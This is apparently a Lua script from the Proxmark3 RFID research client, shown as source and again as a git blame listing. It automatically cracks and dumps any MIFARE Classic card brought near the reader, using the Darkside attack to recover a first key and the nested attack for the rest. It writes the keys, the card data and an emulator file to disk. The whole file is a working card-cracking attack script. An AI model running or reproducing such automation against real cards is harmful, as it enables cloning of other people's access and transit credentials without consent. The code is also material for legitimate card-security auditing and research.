[proxmark3-svn] / client / scripts / mifare_autopwn.lua

local getopt = require('getopt')
local reader = require('read14a')
local cmds = require('commands')

example = "script run mifare_autopwn"
author = "Martin Holst Swende"


desc =
[[
This is a script which automates cracking and dumping mifare classic cards. It sets itself into 
'listening'-mode, after which it cracks and dumps any mifare classic card that you 
place by the device. 

Arguments:
	-d 				debug logging on
	-h 				this help

Output files from this operation:
	<uid>.eml 		- emulator file
	<uid>.html 		- html file containing card data
	dumpkeys.bin	- keys are dumped here. OBS! This file is volatile, as other commands overwrite it sometimes.
	dumpdata.bin	- card data in binary form. OBS! This file is volatile, as other commands (hf mf dump) overwrite it. 

]]

-------------------------------
-- Some utilities 
-------------------------------
local DEBUG = false
--- 
-- A debug printout-function
function dbg(args)
	if DEBUG then
		print(":: ", args)
	end
end 
--- 
-- This is only meant to be used when errors occur
function oops(err)
	print("ERROR: ",err)
	return nil,err
end

--- 
-- Usage help
function help()
	print(desc)
	print("Example usage")
	print(example)
end

---
-- Waits for a mifare card to be placed within the vicinity of the reader. 
-- @return if successfull: an table containing card info
-- @return if unsuccessfull : nil, error
function wait_for_mifare()
	while not core.ukbhit() do
		res, err = reader.read1443a(false, true)
		if res then return res end
		-- err means that there was no response from card
	end
	return nil, "Aborted by user"
end

function nested(key,sak)
	local typ = 1
	if 0x18 == sak then --NXP MIFARE Classic 4k | Plus 4k
		typ = 4
	elseif 0x08 == sak then -- NXP MIFARE CLASSIC 1k | Plus 2k
		typ= 1
	elseif 0x09 == sak then -- NXP MIFARE Mini 0.3k
		typ = 0
	elseif  0x10 == sak then-- "NXP MIFARE Plus 2k"
		typ = 2
	elseif  0x01 == sak then-- "NXP MIFARE TNP3xxx 1K"
		typ = 1
	else
		print("I don't know how many sectors there are on this type of card, defaulting to 16")
	end
	local cmd = string.format("hf mf nested %d 0 A %s d",typ,key)
	core.console(cmd)
end

function dump(uid)
	core.console("hf mf dump")
	-- Save the global args, those are *our* arguments
	local myargs = args
	-- Set the arguments for htmldump script
	args =("-o %s.html"):format(uid)
	-- call it 
	require('../scripts/htmldump')

	args =""
	-- dump to emulator
	require('../scripts/dumptoemul')
	-- Set back args. Not that it's used, just for the karma... 
	args = myargs
end

--- 
-- The main entry point
function main(args)


	local verbose, exit,res,uid,err,_,sak
	local seen_uids = {}

	-- Read the parameters
	for o, a in getopt.getopt(args, 'hd') do
		if o == "h" then help() return end
		if o == "d" then DEBUG = true end
	end

	while not exit do
		res, err = wait_for_mifare()
		if err then return oops(err) end
		-- Seen already?
		uid = res.uid
		sak = res.sak
		if not seen_uids[uid] then
			-- Store it
			seen_uids[uid] = uid
			print("Card found, commencing crack", uid)
			-- Crack it
			local key, cnt
			err, res = core.mfDarkside()
			if     err == -1 then return oops("Button pressed. Aborted.") 
			elseif err == -2 then return oops("Card is not vulnerable to Darkside attack (doesn't send NACK on authentication requests).")
			elseif err == -3 then return oops("Card is not vulnerable to Darkside attack (its random number generator is not predictable).")
			elseif err == -4 then return oops([[
Card is not vulnerable to Darkside attack (its random number generator seems to be based on the wellknown
generating polynomial with 16 effective bits only, but shows unexpected behaviour.]])
			elseif err == -5 then return oops("Aborted via keyboard.")
			end
			-- The key is actually 8 bytes, so a 
			-- 6-byte key is sent as 00XXXXXX
			-- This means we unpack it as first
			-- two bytes, then six bytes actual key data
			-- We can discard first and second return values
			_,_,key = bin.unpack("H2H6",res)
			print("Key ", key)

			-- Use nested attack
			nested(key,sak)
			-- Dump info
			dump(uid)
		end
	end
end

-- Call the main 
main(args)
Commit	Line	Data
0dae56d8	1	local getopt = require('getopt')
	2	local reader = require('read14a')
	3	local cmds = require('commands')
	4
	5	example = "script run mifare_autopwn"
	6	author = "Martin Holst Swende"
	7
	8
	9	desc =
	10	[[
7779d73c	11	This is a script which automates cracking and dumping mifare classic cards. It sets itself into
0dae56d8	12	'listening'-mode, after which it cracks and dumps any mifare classic card that you
	13	place by the device.
	14
	15	Arguments:
	16	-d debug logging on
	17	-h this help
	18
	19	Output files from this operation:
	20	<uid>.eml - emulator file
	21	<uid>.html - html file containing card data
	22	dumpkeys.bin - keys are dumped here. OBS! This file is volatile, as other commands overwrite it sometimes.
	23	dumpdata.bin - card data in binary form. OBS! This file is volatile, as other commands (hf mf dump) overwrite it.
	24
	25	]]
	26
	27	-------------------------------
	28	-- Some utilities
	29	-------------------------------
	30	local DEBUG = false
	31	---
	32	-- A debug printout-function
	33	function dbg(args)
	34	if DEBUG then
	35	print(":: ", args)
	36	end
	37	end
	38	---
	39	-- This is only meant to be used when errors occur
	40	function oops(err)
	41	print("ERROR: ",err)
	42	return nil,err
	43	end
	44
	45	---
	46	-- Usage help
	47	function help()
	48	print(desc)
	49	print("Example usage")
	50	print(example)
	51	end
	52
	53	---
	54	-- Waits for a mifare card to be placed within the vicinity of the reader.
	55	-- @return if successfull: an table containing card info
	56	-- @return if unsuccessfull : nil, error
	57	function wait_for_mifare()
	58	while not core.ukbhit() do
5d8f664d	59	res, err = reader.read1443a(false, true)
0dae56d8	60	if res then return res end
	61	-- err means that there was no response from card
	62	end
	63	return nil, "Aborted by user"
	64	end
	65
51defdd4	66	function nested(key,sak)
	67	local typ = 1
	68	if 0x18 == sak then --NXP MIFARE Classic 4k \| Plus 4k
	69	typ = 4
	70	elseif 0x08 == sak then -- NXP MIFARE CLASSIC 1k \| Plus 2k
	71	typ= 1
	72	elseif 0x09 == sak then -- NXP MIFARE Mini 0.3k
	73	typ = 0
	74	elseif 0x10 == sak then-- "NXP MIFARE Plus 2k"
	75	typ = 2
9484ff3d	76	elseif 0x01 == sak then-- "NXP MIFARE TNP3xxx 1K"
9484ff3d	77	typ = 1
51defdd4	78	else
	79	print("I don't know how many sectors there are on this type of card, defaulting to 16")
	80	end
	81	local cmd = string.format("hf mf nested %d 0 A %s d",typ,key)
0dae56d8	82	core.console(cmd)
	83	end
	84
	85	function dump(uid)
	86	core.console("hf mf dump")
	87	-- Save the global args, those are our arguments
	88	local myargs = args
	89	-- Set the arguments for htmldump script
	90	args =("-o %s.html"):format(uid)
	91	-- call it
	92	require('../scripts/htmldump')
	93
	94	args =""
	95	-- dump to emulator
	96	require('../scripts/dumptoemul')
	97	-- Set back args. Not that it's used, just for the karma...
	98	args = myargs
	99	end
	100
	101	---
	102	-- The main entry point
	103	function main(args)
	104
	105
51defdd4	106	local verbose, exit,res,uid,err,_,sak
0dae56d8	107	local seen_uids = {}
	108
	109	-- Read the parameters
	110	for o, a in getopt.getopt(args, 'hd') do
	111	if o == "h" then help() return end
	112	if o == "d" then DEBUG = true end
	113	end
	114
	115	while not exit do
	116	res, err = wait_for_mifare()
	117	if err then return oops(err) end
	118	-- Seen already?
	119	uid = res.uid
51defdd4	120	sak = res.sak
0dae56d8	121	if not seen_uids[uid] then
	122	-- Store it
	123	seen_uids[uid] = uid
	124	print("Card found, commencing crack", uid)
	125	-- Crack it
	126	local key, cnt
7779d73c	127	err, res = core.mfDarkside()
	128	if err == -1 then return oops("Button pressed. Aborted.")
	129	elseif err == -2 then return oops("Card is not vulnerable to Darkside attack (doesn't send NACK on authentication requests).")
	130	elseif err == -3 then return oops("Card is not vulnerable to Darkside attack (its random number generator is not predictable).")
	131	elseif err == -4 then return oops([[
	132	Card is not vulnerable to Darkside attack (its random number generator seems to be based on the wellknown
	133	generating polynomial with 16 effective bits only, but shows unexpected behaviour.]])
	134	elseif err == -5 then return oops("Aborted via keyboard.")
	135	end
b9697139	136	-- The key is actually 8 bytes, so a
	137	-- 6-byte key is sent as 00XXXXXX
	138	-- This means we unpack it as first
	139	-- two bytes, then six bytes actual key data
	140	-- We can discard first and second return values
	141	_,_,key = bin.unpack("H2H6",res)
0dae56d8	142	print("Key ", key)
	143
	144	-- Use nested attack
51defdd4	145	nested(key,sak)
0dae56d8	146	-- Dump info
	147	dump(uid)
	148	end
	149	end
	150	end
	151
	152	-- Call the main
	153	main(args)